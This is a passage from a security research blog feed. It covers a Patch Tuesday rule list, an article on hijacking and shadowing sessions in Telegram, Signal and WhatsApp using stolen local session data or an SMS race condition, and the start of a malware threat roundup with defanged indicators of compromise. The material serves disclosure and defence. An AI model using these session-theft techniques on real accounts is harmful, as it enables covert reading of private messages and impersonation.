href="https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2018-8630">CVE-2018-8630</a></li><li><a href="https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2018-8635">CVE-2018-8635</a></li><li><a href="https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2018-8637">CVE-2018-8637</a></li><li><a href="https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2018-8638">CVE-2018-8638</a></li><li><a href="https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2018-8639">CVE-2018-8639</a></li><li><a href="https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2018-8643">CVE-2018-8643</a></li></ul><h3 style="text-align: left;">Coverage&nbsp;</h3>In response to these vulnerability disclosures, Talos is releasing the following SNORTⓇ rules that detect attempts to exploit them. Please note that additional rules may be released at a future date and current rules are subject to change pending additional information. Firepower customers should use the latest update to their ruleset by updating their SRU. Open Source Snort Subscriber Rule Set customers can stay up-to-date by downloading the latest rule pack available for purchase on Snort.org.<br /><br />Snort rules: 45142, 45143, 48509, 48510, 48513 - 48520, 48531 - 48534, 48559, 48562</div><img src="http://feeds.feedburner.com/~r/feedburner/Talos/~4/ivPs31SzFMM" height="1" width="1" alt=""/>2018-12-13T14:16:34.868-05:000https://blog.talosintelligence.com/2018/12/microsoft-patch-tuesday-december-2018.htmlin(Secure) messaging apps — How side-channel attacks can compromise privacy in WhatsApp, Telegram, and Signalhttp://feedproxy.google.com/~r/feedburner/Talos/~3/RBmLA4Qd1ho/secureim.htmlsecure instant messagingsignalTalosTALOS-2018-0643telegramwhatsappnoreply@blogger.com (Vitor Ventura)Mon, 10 Dec 2018 08:51:00 PSTtag:blogger.com,1999:blog-1029833275466591797.post-1965104554387511859This blog post is authored by&nbsp;<a href="https://twitter.com/_vventura" style="font-size: medium; font-weight: 400;">Vitor Ventura</a><span style="font-size: small; font-weight: 400;">.</span><br /><h3>Executive summary</h3><div><br /></div><div style="text-align: justify;"><div style="text-align: left;">Messaging applications have been around since the inception of the internet. But recently, due to the increased awareness around mass surveillance in some countries, more users are installing end-to-end encrypted apps dubbed "secure instant messaging applications." These apps claim to encrypt users' messages and keep their content secure from any third parties.</div></div><div style="text-align: justify;"><div style="text-align: left;"><br /></div></div><div style="text-align: justify;"><div style="text-align: left;">However, after a deep dive into three of these secure messaging apps — Telegram, WhatsApp and Signal — we discovered that these services may not fulfill the promises they are meant to keep by putting users' confidential information at risk.</div></div><div style="text-align: justify;"><div style="text-align: left;"><br /></div></div><div style="text-align: justify;"><div style="text-align: left;">This is a serious problem, considering users download these apps in the hopes that their photos and messages will stay completely protected from third parties. These apps, which have countless users, cannot assume that their users are security educated and understand the risk of enabling certain settings on their device. As such, they have an obligation to explain the risks to users, and when possible, adopt safer defaults in their settings. In this post, we will show how an attacker could compromise these applications by performing side-channel attacks that target the operating system these apps delegated their security to. This post will dive into the methods in which these apps handle users' data. It will not include deep technical analysis of these companies' security.</div></div><a name='more'></a><h3>Secure messaging applications</h3><div><br /></div><div style="text-align: justify;"><div style="text-align: left;">The concept behind secure messaging apps is that the content of all communication is encrypted between users without third parties involved. This means the service provider should not be able to read the content at any point. </div></div><div style="text-align: justify;"><div style="text-align: left;"><br /></div></div><div style="text-align: justify;"><div style="text-align: left;">To achieve end-to-end encryption, these applications either developed their own cryptographic protocol or adopted a third-party one. There are two main protocols these apps usually use: MT Protocol developed by the secure messaging app Telegram, and Signal Protocol, developed by the software firm Open Whisper Systems. Since MT Protocol implementation is not open-source, most of the remaining applications either use Signal Protocol or implemented a variation of it. Other applications, which are beyond the scope of this post, use this protocol upon request from the user, but not by default. That is the case of both Facebook Messenger, which utilizes a feature known as "Secret Conversations" and Google Allo, which has a feature called "Incognito" chats. In both protocols, the cryptographic implementation has been highly scrutinised by the security community. Researchers in the past have analyzed publicly available source code and performed black-box analysis in real-time communication data.</div></div><br /><div style="text-align: justify;"><div style="text-align: left;">However, a secure messaging application is much more than the cryptographic protocol. There are other components, such as the UI framework, file storage model, group enrollment and mechanisms that could all be used as an attack vector. The <a href="https://www.trustwave.com/Resources/SpiderLabs-Blog/CVE-2018-1000136---Electron-nodeIntegration-Bypass/">vulnerability</a> CVE 2018-1000136 found in the Electron framework, which is used by both WhatsApp and Signal to build their user interface, is a good example of this. This vulnerability, in a worst case scenario, could allow an attacker to execute code remotely or could be used to copy messages.</div></div><div style="text-align: justify;"><div style="text-align: left;"><br /></div></div><div style="text-align: justify;"><div style="text-align: left;">These protocols are focused on keeping communications private while in transit. However, they usually provide no assurances about security while the data is processing or when the message reaches the user's device. These protocols also don't manage group enrollment on these applications, as evidenced by the <a href="https://www.wired.com/story/whatsapp-security-flaws-encryption-group-chats/">recent vulnerability</a> found in WhatsApp. If an attacker compromises a WhatsApp server, they could add new members to a group without the group administrator's approval, allowing them to read new messages. This means there's the potential for a motivated actor to pick and choose specific WhatsApp groups to eavesdrop on, breaking the common understanding that this application provides bulletproof end-to-end encryption on all communications. </div></div><br /><div style="text-align: center;"><div style="text-align: left;"><a href="http://2.bp.blogspot.com/-qg8444j9s7w/XA6NEN9J2kI/AAAAAAAAAVs/xhKhzzb7VlwPHx2nKCX_s5MdoufdoSJVwCK4BGAYYCw/s1600/image5.png" imageanchor="1"><img border="0" height="400" src="https://2.bp.blogspot.com/-qg8444j9s7w/XA6NEN9J2kI/AAAAAAAAAVs/xhKhzzb7VlwPHx2nKCX_s5MdoufdoSJVwCK4BGAYYCw/s400/image5.png" width="390" /></a></div></div><div style="text-align: center;"><div style="text-align: left;">A presentation from Signal pledges to keep users' messages secure.</div></div><div style="text-align: center;"><div style="text-align: left;">Source: http://www.signal.org</div></div><br /><div style="text-align: justify;"><div style="text-align: left;">Behind the technical aspects of these applications is also an essential human aspect. </div></div><div style="text-align: justify;"><div style="text-align: left;"><br /></div></div><div style="text-align: justify;"><div style="text-align: left;">All of these applications advertise themselves as secure and privacy-minded. Some of them even go as far as to state that they are "safe from hacker attacks." All these statements are meant to create trust between the users and the application. Users trust that the applications will keep their private data safe.</div></div><div style="text-align: justify;"><div style="text-align: left;"><br /></div></div><div style="text-align: justify;"><div style="text-align: left;">Given that all of these applications claim to have millions of active users, it is clear that not all of these users will be cyber security-educated. As such, most of them won't have a full understanding of the risks and limitations posed by certain configurations on these applications. Keeping a person's privacy safe is more than just technology, it's also about providing the users with the correct information in a manner that they are able to understand the risks of their decisions, even without being security experts.</div></div><br /><div style="text-align: center;"><div style="text-align: left;"><a href="http://1.bp.blogspot.com/-O9whtnlLRUg/XA6NPxdhGaI/AAAAAAAAAV0/LrJtPzCXexw5rkakw8mocpGCb9BEatp5wCK4BGAYYCw/s1600/image8.png" imageanchor="1"><img border="0" height="370" src="https://1.bp.blogspot.com/-O9whtnlLRUg/XA6NPxdhGaI/AAAAAAAAAV0/LrJtPzCXexw5rkakw8mocpGCb9BEatp5wCK4BGAYYCw/s400/image8.png" width="400" /></a></div></div><div style="text-align: center;"><div style="text-align: left;">A Telegram advertisement states that it will keep users' messages "safe from hacker attacks."</div></div><div style="text-align: center;"><div style="text-align: left;">Source: <a href="http://www.telegram.com/">http://www.telegram.com</a></div></div><br /><div style="text-align: justify;"><div style="text-align: left;">Another significant feature that is advertised on these apps is their multi-platform capability. All apps support the major mobile device platforms and a desktop version. The typical user will rightfully believe that the security level is the same on all platforms. All the applications' websites present the idea that the security, privacy and platforms are kept at the same level.</div></div><br /><div style="text-align: center;"><div style="text-align: left;"><a href="http://2.bp.blogspot.com/-fUZLDpMiyH8/XA6NkNa1HsI/AAAAAAAAAWA/_Kb6vXEjD8sGq6LGUJ7XFc8P3z5Pep9egCK4BGAYYCw/s1600/image7.png" imageanchor="1"><img border="0" height="291" src="https://2.bp.blogspot.com/-fUZLDpMiyH8/XA6NkNa1HsI/AAAAAAAAAWA/_Kb6vXEjD8sGq6LGUJ7XFc8P3z5Pep9egCK4BGAYYCw/s400/image7.png" width="400" /></a></div></div><div style="text-align: center;"><div style="text-align: left;">This signal advertisement shows users that they can use the app on various platforms</div></div><div style="text-align: center;"><div style="text-align: left;">Source <a href="http://www.signal.org/">http://www.signal.org</a></div></div><br /><div style="text-align: justify;"><div style="text-align: left;">Implementing security features tends to vary between these various platforms. Some platforms have more risks than others and these risks need to be communicated to the users since they will usually assume that each platform provides the same level of security protection.</div></div><h3>The problem</h3><div><br /></div><div style="text-align: justify;"><div style="text-align: left;">The majority of these applications' users are not cybersecurity educated, which means they blindly trust these applications to keep their information safe and secure. It is clear that the source of such trust is the way the applications advertise their services.</div></div><div style="text-align: justify;"><div style="text-align: left;"><br /></div></div><div style="text-align: justify;"><div style="text-align: left;">On May 16, 2018, Talos published an article on <a href="https://blog.talosintelligence.com/2018/05/telegrab.html">Telegrab</a>, a malware that can hijack sessions from Telegram. The concept is simple: If an attacker can copy the session tokens from a desktop user, then it will be able to hijack the session. The attacker won't need anything else other than the information that is stored locally. It doesn't matter if the information is encrypted or not — by copying this information, the attacker will be able to use it to create a shadow session.</div></div><div style="text-align: justify;"><div style="text-align: left;"><br /></div></div><div style="text-align: justify;"><div style="text-align: left;">Following up on that research, we decided to check if the same technique was also applicable to other messaging applications, which was proven to be correct on all tested applications (Telegram, Signal, WhatsApp). Not all of these applications handled sessions in the same way, which leads to different consequences upon this attack. </div></div><div style="text-align: justify;"><div style="text-align: left;"><br /></div></div><div style="text-align: justify;"><div style="text-align: left;">In the next section, we will describe some of these attack scenarios where the sessions of these applications can be replicated or hijacked.</div></div><div style="text-align: justify;"><div style="text-align: left;"><br /></div></div><h2>Applications</h2><h3 id="h.2et92p0">Telegram — Desktop session hijacking</h3><div><br /></div>Telegram seems to be the application where session hijacking is most likely to happen without users having any kind of indication that the attack occurred. Messages and images that are sent or received by the victim are replicated into the attacker's session. <br /><br /><div style="text-align: center;"><div style="text-align: left;"><a href="http://2.bp.blogspot.com/-Y0BuRAXnbGk/XA6N_KNxdTI/AAAAAAAAAWM/OCNX3RYGlJYY2T_TrSwGy8MkFu4OG3zmACK4BGAYYCw/s1600/image3.png" imageanchor="1"><img border="0" height="400" src="https://2.bp.blogspot.com/-Y0BuRAXnbGk/XA6N_KNxdTI/AAAAAAAAAWM/OCNX3RYGlJYY2T_TrSwGy8MkFu4OG3zmACK4BGAYYCw/s400/image3.png" width="287" /></a></div></div><div style="text-align: center;"><div style="text-align: left;">Dual sessions on Telegram desktop environments.</div></div><br /><div style="text-align: justify;"><div style="text-align: left;">Once the attacker starts the Telegram desktop application using the stolen session information, a new session is established without giving any warning to the user. The user has to check if there is an additional session in use. This is carried out by navigating through the settings, which isn't obvious to the average user. When the message does show up on Telegram, it isn't obvious to the average user, either.</div></div><h3 id="h.tyjcwt">Signal — Desktop session hijacking</h3><div><br /></div><div style="text-align: justify;"><div style="text-align: left;">Signal handles the session hijacking as a race condition. When the attacker starts the application using the stolen session information, they both compete for the session. As a result, the user will see error messages on the desktop application, but not the mobile device. </div></div><br /><div style="text-align: center;"><div style="text-align: left;"><a href="http://4.bp.blogspot.com/-Xm9q-_rPiFw/XA6OakOdtGI/AAAAAAAAAWY/qfEGU6acD_gUXdPJO4HY2dVn3UPtxUeFgCK4BGAYYCw/s1600/image2.png" imageanchor="1"><img border="0" height="354" src="https://4.bp.blogspot.com/-Xm9q-_rPiFw/XA6OakOdtGI/AAAAAAAAAWY/qfEGU6acD_gUXdPJO4HY2dVn3UPtxUeFgCK4BGAYYCw/s640/image2.png" width="640" /></a></div></div><div style="text-align: center;"><div style="text-align: left;">Sessions created on Mac will work on Windows and vice-versa.</div></div><br /><div style="text-align: justify;"><div style="text-align: left;">However, by the time the victim receives these messages, the attacker already has access to all contacts and previous chats which were not deleted.</div></div><div style="text-align: justify;"><div style="text-align: left;"><br /></div></div><div style="text-align: justify;"><div style="text-align: left;">In order to prevent the race condition, the attacker can simply delete the session information. When the user starts the application, it will receive a request to re-link the application.</div></div><div style="text-align: justify;"><div style="text-align: left;"><br /></div></div><div style="text-align: justify;"><div style="text-align: left;">For a security expert, this would be a red flag. But for the average user, they may think it's just an error in the application.</div></div><div style="text-align: center;"><div style="text-align: left;"><a href="http://2.bp.blogspot.com/-XftY4Dn-wJQ/XA6O8SDAzsI/AAAAAAAAAWw/kiZODVzcrvARqVyxpNrRGt8LT5X3ZuYtwCK4BGAYYCw/s1600/image9.jpg" imageanchor="1"><img border="0" height="400" src="https://2.bp.blogspot.com/-XftY4Dn-wJQ/XA6O8SDAzsI/AAAAAAAAAWw/kiZODVzcrvARqVyxpNrRGt8LT5X3ZuYtwCK4BGAYYCw/s400/image9.jpg" width="225" /></a></div></div><div style="text-align: center;"><div style="text-align: left;">Two sessions for the same device.</div></div><br /><div style="text-align: justify;"><div style="text-align: left;">When the user creates the second session, it will only be visible from the mobile device, and by default, the two sessions will have the same name. </div></div><div style="text-align: justify;"><div style="text-align: left;"><br /></div></div><div style="text-align: justify;"><div style="text-align: left;">Therefore, the attacker will have the ability to view all messages and even impersonate the victims. The messages sent by the attacker will reach the victim's legitimate devices, but the attacker can delete them while sending them, avoiding detection. If the impersonation is done using the "Disappearing messages" feature, it will be even harder for the victim to identify the imitation.</div></div><h3 id="h.botsrppqptqr">WhatsApp — Desktop session hijacking</h3><div><br /></div><div style="text-align: justify;"><div style="text-align: left;">WhatsApp is the only application that has implemented a notification mechanism if there's a second session opened on a desktop. Under normal operations, if an attacker uses the stolen session information, the victim should receive a warning like the image below.</div></div><br /><div style="text-align: center;"><div style="text-align: left;"><a href="http://1.bp.blogspot.com/-IH7gI_KnwPY/XA6PFojOaGI/AAAAAAAAAW4/6sT5QR22JCkrCxQZMMjUdx2rgHq5LlMfgCK4BGAYYCw/s1600/image1.png" imageanchor="1"><img border="0" height="397" src="https://1.bp.blogspot.com/-IH7gI_KnwPY/XA6PFojOaGI/AAAAAAAAAW4/6sT5QR22JCkrCxQZMMjUdx2rgHq5LlMfgCK4BGAYYCw/s400/image1.png" width="400" /></a></div></div><div style="text-align: center;"><div style="text-align: left;">WhatsApp multiple login notice.</div></div><br /><div style="text-align: justify;"><div style="text-align: left;">This notice pops up in the application that is online when the second session is created. The second session will be live and usable until the user makes a decision. So, by the time this notice appears, the attacker already has access to all of the victim's contacts and previous messages. The attacker will also be able to impersonate the victims until there is an answer to the message box. In an attack scenario where the victim is away from the terminal, the attacker will have access until the victim is back at the terminal. The victim will have no obvious warning on the mobile device alerting them of what happened. The current notice exists every time the victim uses the desktop client. A second session won't change the warning.</div></div><br /><div style="text-align: justify;"><div style="text-align: left;">This warning mechanism has a flaw, as it is possible for an attacker to bypass it following the procedure below.</div></div><br /><div style="text-align: center;"><div style="text-align: left;"><a href="http://3.bp.blogspot.com/-IxPrp_BWnfU/XA6PPgj0qII/AAAAAAAAAXE/K1kjeTceRPARTaFxjPSbzid7yzWUa4C7gCK4BGAYYCw/s1600/image4.png" imageanchor="1"><img border="0" height="539" src="https://3.bp.blogspot.com/-IxPrp_BWnfU/XA6PPgj0qII/AAAAAAAAAXE/K1kjeTceRPARTaFxjPSbzid7yzWUa4C7gCK4BGAYYCw/s640/image4.png" width="640" /></a></div></div><br /><div style="text-align: justify;"><div style="text-align: left;">The attacker can simplify the procedure by skipping step 4 and waiting before executing step 5. The result will be the same since they will have access to the same messages. The attacker will only lose access if the victim manually terminates the session on the mobile device.</div><div style="text-align: left;"><br /></div></div><div style="text-align: justify;"><div style="text-align: left;">This vulnerability was disclosed to Facebook according to our coordinated disclosure policy. All the advisory details can be found <a href="https://www.talosintelligence.com/vulnerability_reports/TALOS-2018-0643">here</a>.&nbsp;</div></div><h3 id="h.ezyjfzr0vkky">Telegram — Mobile session shadowing</h3><div><br /></div>Session abuse isn't a problem just in the desktop environment. Cloned mobile applications abuse these sessions in the wild.<br /><br /><div style="text-align: center;"><div style="text-align: left;"><a href="http://1.bp.blogspot.com/-CfpynEtGXm4/XA6PZCXEGlI/AAAAAAAAAXQ/FMqiLs6IU6QU-emz-lmldv3KhqMVsDpFQCK4BGAYYCw/s1600/image6.png" imageanchor="1"><img border="0" height="400" src="https://1.bp.blogspot.com/-CfpynEtGXm4/XA6PZCXEGlI/AAAAAAAAAXQ/FMqiLs6IU6QU-emz-lmldv3KhqMVsDpFQCK4BGAYYCw/s400/image6.png" width="206" /></a></div></div><div style="text-align: center;"><div style="text-align: left;">Shadow sessions on a mobile device.</div></div><br /><div style="text-align: justify;"><div style="text-align: left;">In the mobile environment, users should not be as concerned about their session being compromised, which under normal circumstances, should be much harder to obtain. The fundamental problem lies in the fact that Telegram allows shadow sessions to coexist on the same device based on the same phone number while handling it in different applications.</div></div><div style="text-align: justify;"><div style="text-align: left;"><br /></div></div><div style="text-align: justify;"><div style="text-align: left;">This enables an attack scenario where an attacker can read all messages and contacts on Telegram until the session is terminated. With mobile devices, sessions are never terminated unless the user specifically requests termination through the options menu.</div></div><div style="text-align: justify;"><div style="text-align: left;"><br /></div></div><div style="text-align: justify;"><div style="text-align: left;">There is another scenario on the Android platform, in which a malicious application could create a shadow session without any user intervention. The malicious application only needs the "read SMS" and the "kill background process" permissions, which are not usually considered as dangerous and could easily pass Google Play store verifications.</div></div><div style="text-align: justify;"><div style="text-align: left;"><br /></div></div><div style="text-align: justify;"><div style="text-align: left;">The Telegram registration process starts by requesting a phone number, which is confirmed through an SMS that contains a unique code. If a user tries to register the same phone number again, Telegram will send a code over the Telegram channel and not an SMS. </div></div><div style="text-align: justify;"><div style="text-align: left;"><br /></div></div><div style="text-align: justify;"><div style="text-align: left;">The change in the delivery channel, from SMS to Telegram message, should prevent malicious applications from creating a shadow session without user interaction since they wouldn't be able to read the code. However, if the registration is not completed within a specific time frame, Telegram assumes the user doesn't have access to the Telegram application and will send a new code over SMS. </div></div><div style="text-align: justify;"><div style="text-align: left;"><br /></div></div><div style="text-align: justify;"><div style="text-align: left;">This backup mechanism creates a race condition that can be exploited by a malicious application, leading to a shadow session being created without user interaction. This entire process is outlined below.</div></div><div style="text-align: center;"><div style="text-align: left;"><a href="http://1.bp.blogspot.com/-2zI0D7Xffr0/XA-NZ6mokUI/AAAAAAAAAX4/2J4veh3fiyow3dCeBJOR7SQLyawADCG7wCK4BGAYYCw/s1600/image10.png" imageanchor="1"><img border="0" height="412" src="https://1.bp.blogspot.com/-2zI0D7Xffr0/XA-NZ6mokUI/AAAAAAAAAX4/2J4veh3fiyow3dCeBJOR7SQLyawADCG7wCK4BGAYYCw/s640/image10.png" width="640" /></a></div></div><br /><div style="text-align: justify;"><div style="text-align: left;">From this point on, the malicious application will have access to all contacts, past and future messages which are not under the "Secret chats."</div></div><h3>Conclusion</h3><div><br /></div><div style="text-align: justify;"><div style="text-align: left;">Secure instant messaging applications have a solid track record of protecting the information while in transit, even going as far as protecting the information from their own servers. However, they fall short when it comes to protecting application state and user information, delegating this protection to the operating system.</div></div><div style="text-align: justify;"><div style="text-align: left;"><br /></div></div><div style="text-align: justify;"><div style="text-align: left;">Signal protocol developers predicted this session hijacking. The session management protocol (<a href="https://signal.org/docs/specifications/sesame/">Sesame protocol</a>) security considerations contains a sub-chapter dedicated to the device compromise, which states, "Security is catastrophically compromised if an attacker learns a device's secret values, such as the identity private key and session state."</div></div><div style="text-align: justify;"><div style="text-align: left;"><br /></div></div><div style="text-align: justify;"><div style="text-align: left;">This attack vector was even predicted by the protocol developers, as such individual users and corporations should be aware that these applications are not risk free. As such, it becomes more important that companies that use these apps to transmit private and sensitive information employ endpoint technology that better protects these assets. </div></div><br /><img src="http://feeds.feedburner.com/~r/feedburner/Talos/~4/RBmLA4Qd1ho" height="1" width="1" alt=""/>2018-12-13T15:49:01.287-05:000https://blog.talosintelligence.com/2018/12/secureim.htmlThreat Roundup for Nov. 30 to Dec. 7http://feedproxy.google.com/~r/feedburner/Talos/~3/mSGJhY1Js_0/threat-roundup-1130-1207.htmlAMPCoverageThreat RoundupThreatGridUmbrellanoreply@blogger.com (William Largent)Fri, 07 Dec 2018 11:44:00 PSTtag:blogger.com,1999:blog-1029833275466591797.post-987875845700548779<div dir="ltr" style="text-align: left;" trbidi="on"><div class="separator" style="clear: both; text-align: center;"><a href="https://3.bp.blogspot.com/-mBbj7I9pcbc/XBKwLGh3XTI/AAAAAAAAABQ/MjxDRHMcG884MPWC8_VvkkBYeFaz38pogCLcBGAs/s1600/recurring%2Bblog%2Bimages_threat%2Broundup.jpg" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" data-original-height="501" data-original-width="1001" src="https://3.bp.blogspot.com/-mBbj7I9pcbc/XBKwLGh3XTI/AAAAAAAAABQ/MjxDRHMcG884MPWC8_VvkkBYeFaz38pogCLcBGAs/s1600/recurring%2Bblog%2Bimages_threat%2Broundup.jpg" /></a></div><br /><div dir="ltr" style="text-align: left;" trbidi="on"><div class="separator" style="clear: both; text-align: center;"></div>Today, Talos is publishing a glimpse into the most prevalent threats we've observed between Nov. 30 and Dec. 07. As with previous roundups, this post isn't meant to be an in-depth analysis. Instead, this post will summarize the threats we've observed by highlighting key behavioral characteristics, indicators of compromise, and discussing how our customers are automatically protected from these threats.</div></div><br />As a reminder, the information provided for the following threats in this post is non-exhaustive and current as of the date of publication. Additionally, please keep in mind that IOC searching is only one part of threat hunting. Spotting a single IOC does not necessarily indicate maliciousness. Detection and coverage for the following threats is subject to updates, pending additional threat or vulnerability analysis. For the most current information, please refer to your Firepower Management Center, Snort.org, or ClamAV.net.<br /><a name='more'></a><br />You can find an additional JSON file <a href="https://alln-extcloud-storage.cisco.com/ciscoblogs/5c0aaf2d47a8b.txt">here</a> that includes the IOCs in this post, as well as all hashes associated with the cluster. That list is limited to 25 hashes in this blog post. As always, please remember that all IOCs contained in this document are indicators, and one single IOC does not indicated maliciousness.<br /><br />The most prevalent threats highlighted in this roundup are:<br /><br /><ul><li><b>Xls.Downloader.Sload-6774021-0</b><br /> Downloader<br /> The Sload downloader launches PowerShell and gathers information about the infected system. The PowerShell may download the final payload or another downloader.<br />&nbsp;</li><li><b>Doc.Downloader.Emotet-6765662-0</b><br /> Downloader<br /> Emotet is a banking trojan that has remained relevant due to its continual evolution to better avoid detection. It is commonly spread via malicious emails and saw a resurgence recently during Black Friday.<br />&nbsp;</li><li><b>Win.Ransomware.Imps-6765847-0</b><br /> Ransomware<br /> This is a trojan horse virus that may steal information from the affected machine and download potentially malicious files that spread via removable drives.<br />&nbsp;</li><li><b>Win.Virus.Sality-6765491-0</b><br /> Virus<br /> Sality is a file infector that establishes a peer-to-peer botnet. Although it's been prevalent for more than a decade, we continue to see new samples that require marginal attention in order to remain consistent with detection. Once a Sality client bypasses perimeter security, its goal is to execute a downloader component capable of executing additional malware.<br />&nbsp;</li><li><b>Win.Packed.Passwordstealera-6765350-0</b><br /> Packed<br /> This malware has the ability to harvest stored credentials, keystrokes, screenshots, network activity, and more from computers where the software is installed. <br />&nbsp;</li><li><b>Doc.Downloader.Sagent-6766662-0</b><br /> Downloader<br /> Sagent launches PowerShell through macros in Microsoft Office documents. The PowerShell then downloads unwanted software from remote websites. <br />&nbsp;</li></ul><hr /><h2>Threats</h2><h3>Xls.Downloader.Sload-6774021-0</h3><br /><h4>Indicators of Compromise</h4><br /><b>Registry Keys</b><br /><ul><li>N/A</li></ul><b>Mutexes</b><br /><ul><li>KYTransactionServer.MutexObject.Administrator</li></ul><b>IP Addresses</b> contacted by malware. Does not indicate maliciousness<br /><ul><li>216[.]239[.]34[.]21</li><li>64[.]210[.]137[.]102</li></ul><b>Domain Names</b> contacted by malware. Does not indicate maliciousness<br /><ul><li>ipinfo[.]io</li><li>images2[.]imgbox[.]com</li></ul><b>Files and or directories created</b><br /><ul><li>%LocalAppData%\Temp\psefaeec.nvt.psm1</li><li>%LocalAppData%\Temp\yb31jdzi.jxl.ps1</li><li>%UserProfile%\Documents\20181205\PowerShell_transcript.PC.ZR0bVMzf.20181205131554.txt</li><li>%LocalAppData%\Temp\CVR1B6D.tmp</li></ul><b>File Hashes</b><br /><ul><li>06f128b08f332142a5e0cb8d6c26a780316623ff62673684ccb9f37f98e3f87e</li><li>07b4dc36a3389ef60f3444bde94f6b9440e6cd2d658671096d01e4909a0044e3</li><li>0fa2d0e86ffca3b299776ef219a1ca248f8bc89eb866c39894780c97859c7540</li><li>132a3cf5d1534553294af816d2796d21c2a7a379eb3fbe6f67e8fda895a68a77</li><li>15c3daf032053b55a6bc280ddbdadfa668172a43609da78a421856b5f84f1381</li><li>24ccc8f6607e2577e1fa9e3f3cb474e6a309f420765bff7d64a38ba1c6a2d508</li><li>393326257ec1f08c2379a375308e0b5a6879ffdb8d68362f46a6a56f2fa9c0b1</li><li>3bfb9adbd0af64301780ae06f4db63fcceb21dad38a8df0f6023c60d51fc71ac</li><li>42728401a73b538b441d0643b302122f03960a26d8f2513af5a780e24bfe9817</li><li>511b09caf3e19d96a2e8606c35ef9e39e18903e7895ae225dd7807cd46d50c21</li><li>55e145df9b9668105f52c6f61e5ca6d421edf7fa1856af1162452a7dce6b6e3c</li><li>5dfe4ad7cc7866e81248aa06e2c8204f6007e9694a5d1a4d6739d9a313ed249f</li><li>5f8fd3edd5feaf3bf12702d0bec48df5710bac2770b59aedeec46c563f2f4df9</li><li>6a7e95ffccb39bce1203731899b14adba3afd79d7bda7f783256011c510ffd0a</li><li>74a2bd67f90c0d6d906286d4aea6de32bd9bfb05ac631de15b8429758573d22f</li><li>7559d01473ed8f6a5d101e39ca32f5d2a975a018a017100967417c5ca8f5f578</li><li>983b13f4ae9b8b9dbb6fd5e4fa024e862628bd748d2ece92cf4b4c2048d88ad7</li><li>b90eb4806c7f5af1b79652abbe4ece28d59dcfe345657cc6e5a04f52e07ded0a</li><li>d23817b23214e53ee9400e9a307b522add72c875d3c98ba397525ac11c963379</li><li>f06ebe75d30a2855c3dd1c6e7b3430765213c52db423f818f770b74329f451a1</li></ul><br /><h4>Coverage</h4><div class="separator" style="clear: both; text-align: center;"><a href="https://1.bp.blogspot.com/-9t2Of3KWq7I/Wz-6a6Dy3kI/AAAAAAAAAbk/5J2B6tJuFS44Fz9CyF7x9wPcTvmCLrV1gCLcBGAs/s320/all-selected-except-cloudlock.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://1.bp.blogspot.com/-9t2Of3KWq7I/Wz-6a6Dy3kI/AAAAAAAAAbk/5J2B6tJuFS44Fz9CyF7x9wPcTvmCLrV1gCLcBGAs/s320/all-selected-except-cloudlock.png" /></a> </div><br /><h4>Screenshots of Detection</h4><b>AMP</b><br /><b><br /></b><br /><div class="separator" style="clear: both; text-align: center;"><a href="https://4.bp.blogspot.com/-c7QWMIAaUas/XAqkGKYa5xI/AAAAAAAABOs/XAfZUu8umDkBza6cUR22FChwZx64MIgOgCLcBGAs/s1600/b90eb4806c7f5af1b79652abbe4ece28d59dcfe345657cc6e5a04f52e07ded0a_amp.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="481" data-original-width="702" height="272" src="https://4.bp.blogspot.com/-c7QWMIAaUas/XAqkGKYa5xI/AAAAAAAABOs/XAfZUu8umDkBza6cUR22FChwZx64MIgOgCLcBGAs/s400/b90eb4806c7f5af1b79652abbe4ece28d59dcfe345657cc6e5a04f52e07ded0a_amp.png" width="400" /></a></div><b><br /></b><br /><b>ThreatGrid</b><br /><b><br /></b><br /><div class="separator" style="clear: both; text-align: center;"><a href="https://3.bp.blogspot.com/--EYepL2oGeI/XAqkLUiUdyI/AAAAAAAABOw/uaC6ndb3UHoL-5EPy4lukguno1NIXrBTwCLcBGAs/s1600/b90eb4806c7f5af1b79652abbe4ece28d59dcfe345657cc6e5a04f52e07ded0a_tg.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="801" data-original-width="962" height="532" src="https://3.bp.blogspot.com/--EYepL2oGeI/XAqkLUiUdyI/AAAAAAAABOw/uaC6ndb3UHoL-5EPy4lukguno1NIXrBTwCLcBGAs/s640/b90eb4806c7f5af1b79652abbe4ece28d59dcfe345657cc6e5a04f52e07ded0a_tg.png" width="640" /></a></div><b><br /></b><br /><b>Malware</b><br /><b><br /></b><br /><div class="separator" style="clear: both; text-align: center;"><a href="https://4.bp.blogspot.com/-WHdvtZarG3c/XAqkPsAm8WI/AAAAAAAABO0/A8BsxfmO8nU-_9MlDutsetEv3sXbpn0CACLcBGAs/s1600/b90eb4806c7f5af1b79652abbe4ece28d59dcfe345657cc6e5a04f52e07ded0a_malware.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="768" data-original-width="1024" height="480" src="https://4.bp.blogspot.com/-WHdvtZarG3c/XAqkPsAm8WI/AAAAAAAABO0/A8BsxfmO8nU-_9MlDutsetEv3sXbpn0CACLcBGAs/s640/b90eb4806c7f5af1b79652abbe4ece28d59dcfe345657cc6e5a04f52e07ded0a_malware.png" width="640" /></a></div><b><br /></b><br /><h3>Doc.Downloader.Emotet-6765662-0</h3><br /><h4>Indicators of Compromise</h4><br /><b>Registry Keys</b><br /><ul><li>&lt;HKLM&gt;\SYSTEM\CONTROLSET001\SERVICES\mwarepwd </li></ul><b>Mutexes</b><br /><ul><li>N/A</li></ul><b>IP Addresses</b> contacted by malware. Does not indicate maliciousness<br /><ul><li>144[.]217[.]184[.]168</li><li>198[.]0[.]36[.]237</li><li>162[.]220[.]11[.]30</li><li>216[.]198[.]175[.]99</li><li>71[.]179[.]135[.]10</li><li>184[.]168[.]177[.]1</li><li>72[.]167[.]191[.]65</li><li>77[.]221[.]130[.]34</li><li>179[.]188[.]11[.]22</li><li>74[.]79[.]252[.]106</li></ul><b>Domain Names</b> contacted by malware. Does not indicate maliciousness<br 